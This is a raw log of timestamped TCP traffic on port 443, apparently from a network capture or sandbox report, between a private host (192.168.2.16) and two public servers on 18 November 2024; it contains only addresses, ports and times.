                                                                                                                                          Nov 18, 2024 06:47:47.211788893 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.282386065 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.282398939 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.282444000 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.282485962 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.282608986 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.282641888 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.282716990 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.284142971 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.284152985 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.284195900 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.284226894 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.284245014 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.284276962 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.284297943 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.285631895 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.285654068 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.285715103 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.285728931 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.285756111 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.285783052 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.325193882 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.325215101 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.325294971 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.325306892 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.325359106 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.328635931 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.328648090 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.328720093 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.328727007 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.328774929 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.328799963 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.328831911 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.330149889 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.330167055 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.330233097 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.330240011 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.330282927 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.331501007 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.331515074 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.331583977 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.331590891 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.331643105 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.332942963 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.332957029 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.333023071 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.333030939 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.333089113 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.398214102 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.398233891 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.398327112 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.398338079 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.398437023 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.399293900 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.399323940 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.399379015 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.399388075 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.399420977 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.399447918 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.400201082 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.400223017 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.400271893 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.400280952 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.400316954 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.400346041 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.401355028 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.401375055 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.401437998 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.401453018 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.401520967 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.441071033 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.441097975 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.441301107 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.441337109 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.441447020 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.448105097 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.448124886 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.448190928 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.448215008 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.448282003 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.448965073 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.448982954 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.449059010 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.449073076 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.449131012 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.450001955 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.450017929 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.450114012 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.450126886 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.450172901 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.450973988 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.450989008 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.451076031 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.451088905 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.451149940 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.489097118 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.489115953 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.489201069 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.489214897 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.489275932 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.513525963 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.513549089 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.513596058 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.513605118 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.513638973 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.513659000 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.514364958 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.514384985 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.514467955 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.514482975 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.514533043 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.515825987 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.515845060 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.515911102 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.515919924 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.515963078 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.516438007 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.516458988 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.516510963 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.516520023 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.516546965 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.516560078 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.556027889 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.556047916 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.556157112 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.556166887 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.556248903 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.566368103 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.566454887 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.566476107 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.566498041 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.566529989 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.566555977 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.566904068 CET55165443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.566935062 CET44355165152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.569833994 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.569896936 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.569974899 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.570208073 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.570233107 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.594417095 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.594468117 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.594552994 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.594813108 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.594844103 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.612375975 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.612562895 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.612623930 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:47.617271900 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:47.617294073 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.617652893 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.617676020 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.617739916 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.617947102 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.617958069 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.628848076 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.628871918 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.628943920 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.628964901 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.629017115 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.629576921 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.629595995 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.629666090 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.629681110 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.629725933 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.630892038 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.630912066 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.630969048 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.630983114 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.631046057 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.631736040 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.631755114 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.631820917 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.631834984 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.631884098 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.632416010 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.632436037 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.632492065 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.632505894 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.632560968 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.743607044 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.743628979 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.743697882 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.743721008 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.743760109 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.743760109 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.744630098 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.744649887 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.744710922 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.744720936 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.744762897 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.745290995 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.745311022 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.745373011 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.745381117 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.745435953 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.746076107 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.746097088 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.746140957 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.746160984 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.746179104 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.746201992 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.747621059 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.747641087 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.747701883 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.747710943 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.747740030 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.747750998 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.786794901 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.786819935 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.786870003 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.786889076 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.786906958 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.786941051 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.787230015 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.787297964 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.787306070 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.787332058 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:47.787379026 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.787524939 CET55164443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:47.787543058 CET44355164152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.617567062 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.617916107 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.617949963 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.618455887 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.618839025 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.618932962 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.619008064 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.626291990 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.626523972 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.626552105 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.627023935 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.627376080 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.627486944 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.627494097 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.663330078 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.666637897 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.666881084 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.666898012 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.667378902 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.667700052 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.667789936 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.667794943 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.671360016 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.684081078 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.709083080 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.709094048 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.851208925 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.858514071 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.900830984 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.901112080 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.901124001 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.949084044 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.969858885 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.969876051 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.969963074 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.969964027 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.970026016 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.970048904 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.970082045 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.970082045 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.970144033 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.971772909 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.971790075 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.971864939 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.971879959 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.971947908 CET55166443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.975469112 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.975481987 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.975505114 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.975514889 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.975542068 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.975543976 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.975577116 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.975640059 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.975640059 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.975689888 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.975724936 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.975750923 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.976066113 CET55167443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.976078033 CET44355167152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.978842020 CET55169443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.978923082 CET44355169152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:48.979002953 CET55169443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.979245901 CET55169443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:48.979274035 CET44355169152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.019927025 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.019957066 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.020001888 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.020020008 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:49.020021915 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.020045996 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:49.020057917 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.020070076 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.020081043 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:49.020108938 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:49.021694899 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.021713972 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.021754980 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.021770000 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:49.021779060 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.021815062 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:49.021845102 CET44355168152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.076092958 CET55168443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:49.091372013 CET44355166152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:49.091434956 CET44355166152.199.21.175192.168.2.16
